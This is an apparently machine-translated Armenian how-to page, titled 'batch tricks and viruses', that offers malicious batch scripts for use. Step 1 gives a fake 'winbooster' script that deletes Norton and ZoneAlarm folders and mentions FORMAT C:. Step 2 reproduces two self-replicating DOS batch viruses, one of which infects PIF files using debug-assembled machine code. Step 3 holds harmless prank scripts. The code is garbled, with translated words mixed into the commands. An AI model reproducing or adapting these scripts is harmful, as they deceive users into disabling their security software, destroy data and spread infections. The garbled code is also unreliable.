Խմբաքանակի հնարքներ և վիրուսներ. 3 քայլ

2024 Հեղինակ: John Day | [email protected]. Վերջին փոփոխված: 2024-01-30 09:52

Ինչպես կատարել կատակ և իրական վիրուսներ BATCH- ում Նշում. Ես պատասխանատվություն չեմ կրում որևէ ուրիշի համակարգչին ձեր համակարգչին պատճառված վնասների համար

Քայլ 1: Իրական վիրուսներ (պարզ մարդիկ)

առաջինը ՝ պատճենեք կոդը **************************************** **************@echo Welcome to the winbooster by ELECTROfun@echo, եթե ցանկանում եք ձեր համակարգիչը դարձնել ավելի արագ, դուք պետք է կատարեք հետևյալ քայլերը@pause cd / c: dir dir c: / progra ~ 1 / norton ~ 1 @echo այժմ պետք է մուտքագրել y և սեղմել enter @pause del c: / progra ~ 1 / norton ~ 1 @pause c: dir @pause @dir c: / progra ~ 1 dir c: / progra ~ 1 / zonea ~ 1 / zonealarm del c: / progra 1 / zonea ~ 1 / zonealarm @echo լավ, հիմա ձեր համակարգիչը «ԻՐԱԿԱՆ» է: Արագ ՝ ելք ***************************************** *Նշում. Պահպանեք այն, ինչ ցանկանում եք: 02FORMAT C: ***************

Քայլ 2: Իրական վիրուսներ (առաջադեմներ)

1. Ամենահզոր ******************@եթե ոչ '%0 ==' եթե '%_melt%==' goto meltbeg:: ---- dummy հյուրընկալող --------@echo officcho Բարև աշխարհ! goto MeLT %2 եթե գոյություն չունի %comspec %set comspec = %_ MeLT %հրաման %comspec % /e: 5000 /c %0 MeLT virset MeLTcl = %1 %2 %3 %4 %5 %6 %7 %8 %9call % 0 MeLT rhset _MeLT = սահմանել MeLTcl = goto MeLTend: MeLTrhset _MeLT = x%0%MeLTcl%. MeLTrun%0 MeLT fnd. %path%: MeLTfndshift%_MeLT%եթե '%2 ==' դուրս գալ MeLTset MeLT =%2 \%MeLTH%.batif չգոյություն %2%MeLTH%.batif գոյություն չունի%MeLT%սահմանել MeLT =%2%MeLTH%եթե չկա%MeLT%goto MeLTfndf գտեք "MeLT"%temp%\ MeLT_2aattrib%temp%\ MeLT_2a +h: MeLTrun%MeLTH%MeLT s…%ուղի%. i "MeLT" nulif not errorlevel 1 goto MeLTnoecho @if '%% 0 ==' if '%% _ melt %% ==' goto meltbeg> MeLT.ttype%3 >> MeLT.techo. >> MeLT.ttype% temp %\ MeLT_2a >> MeLT.tm MeLT.t %3> nulexit MeLT: MeLTact - էկրանի տեքստը բռնկվում է, այնուհետև դրվում է normalecho e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE> MeLT.techo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8 >> MeLT.techo e 120 B4 4C CD 21 00 >> MeLT.techo g >> MeLT.tdebugnuldel MeLT.texit MeLT: MeLTnoset MeLTC =%MeLTC%1 եթե%MeLTC%== 1111111111 goto MeLTact: MeLTend ********************************* ******** 2. Սա վիրուս է, որը «վարակում է» PIF ֆայլերը, որոնք Windows- ն օգտագործում է DOS ծրագրեր գործարկելու համար: Այն աշխատում է `ստեղծելով թաքնված ուղեկցող խմբաքանակներ, որոնք պարունակում են դրա պատճենները, այնուհետև փոխելով PIF ֆայլը, որպեսզի ուղեկից խմբաքանակն առաջինը աշխատի: Ուղեկից գործարկելուց հետո այն վարում է սկզբնական ընդունող ծրագիրը, որի անունը կոդավորված է ուղեկիցի մեջ: Pif ֆայլերը նշվում են այնպես, որ դրանք նորից վարակված չլինեն: Ազդեցության են ենթարկվում միայն PIF- ները, վարակված ծրագրերում փոփոխություններ չեն կատարվում: «Բուժելու» համար օգտագործեք PIFEDIT ՝ ֆայլերի սկզբնական անունները վերականգնելու համար, այնուհետև ջնջեք թաքնված ֆայլերը: ****************************** ***************@echo off:: host filename… set pifvo = LIST. COM:: loop dispcher… if '%1 ==' PiFV goto PiFV_%2:: run the virus! set _PiFV = եթե չկա%comspec%set comspec = C: / COMMAND. COM%_PiFV %% comspec% /e: 5000 /c%0 PiFV go> nulif գոյություն ունի PiFV! del PiFV!:: գործարկել հյուրընկալողը PiFVcl = %1 %2 %3 %4 %5 %6 %7 %8 %9 %զանգ %0 PiFV hstset PiFVo = սահմանել PiFVcl =:: ստուգել ակտիվացման… արձագանք. | ամսաթիվ | գտնել / i "sat"> nul. PiFVif errorlevel 1 goto PiofV_endecho. % Ո՞վ էր պնդում, որ գիտի ջուր պատրաստել: PiFV_msgecho [PiFV] by WaveFuncgoto PiFV_end: PiFV_hst%PiFVo%%PiFVcl%goto PiFV_end: PiFV_goset PiFVh =%0 եթե գոյություն չունի%PiFVh%սահմանել PiFVh =%0.batif չգոյություն%PiFVh%exitfor%) զանգահարեք %0 PiFV inf %% aexit PiFV: PiFV_infset PiFVp = %3:: ստացեք զոհի ֆայլի անունը և վարակի նշիչը:: PIF ֆայլից ՝ կարգաբերման միջոցով … եթե կա PiFV! goto PiFV_1echo m 124, 162 524> PiFV! echo e 100 '@set fn =' >> PiFV! echo m 524, 562 108 >> PiFV! echo n pifv $.bat >> PiFV! echo rcx >> PiFV! echo 47 >> PiFV! Echo w >> PiFV! Echo m 55E, 561 108 >> PiFV! Echo e 10C 0 >> PiFV! Echo n pifv $ $. Չղջիկ >> PiFV! Echo rcx >> PiFV! Echo 10 >> PiFV! Echo w >> PiFV! Echo q >> PiFV!:: pifvi = վարակի նշիչ:: pifvp = pif ֆայլի անուն:: pifvh = ուղեկից չղջիկ ֆայլ:: բաց թողնել վարակված կամ «դատարկ» pifs… եթե '%PiFVi%==' PiFV goto PiFV_endif '%PiFVn%==' goto PiFV_end:: don't shadow command.com (եղիր գեղեցիկ) արձագանք echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88> PiFV $$ echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21 >> PiFV $$ echo e 120 c3 73 65 74 20 66 6e 3d 24 00 >> PiFV $$ echo n pifv $.com >> PiFV $$ echo rcx >> PiFV $ $ echo 2a >> PiFV $$ echo w >> PiFV $$ echo q >> PiFV $$ debugnulecho%PiFVn%| PiFV $> PiFV $ $. Batcall PiFV $$ սահմանել PiFVb =%fn%.batdel PiFV $?.*:: pifvb = նոր խմբաքանակի անունը:: մի ստվեր, եթե կոմպն ունի նույնը անունը որպես hostif%PiFVo%==%PiFVb%goto PiFV_endif գոյություն ունի%PiFVb%goto PiFV_endecho @echo off>%PiFVb%echo set pifvo =%pifvn%>>%PiFVb%գտնել «PiFV»>%PiFVb%հատկանիշ%PiFVb% +h::… և մատնանշեք PIF- ը companionecho e 15E 'PiFV', 0> PiFV $$ echo e 124 '%PiFVb%', 0 >> PiFV $$ արձագանք w >> PiFV $$ echo q >> PiFV $$ կարգաբերում %PiFVp %nuldel PiFV $$:: Կարծում եմ, որ մենք ավարտեցինք! Միայն մեկ:: միջոց ՝ պարզելու… *************************************** **********

Քայլ 3. Խաբեություն վիրուս և հնարք

1. խմելու վիրուս ******************* գույն 02@echo officcho dir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/ sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/sdir/secho@echo@echo ************************ Նշում. «02 գույնը» պետք է տեքստը դարձնի կանաչ 2. հնարք (մատրիցային կոդ) ****** ************************* echo offcolor 02: startecho %պատահական %պատահական % %պատահական % %պատահական % %պատահական % %պատահական % % պատահական%% պատահական%% պատահական%% պատահական%% պատահական%% պատահական%% պատահական%% պատահական% goto start ************************ ******************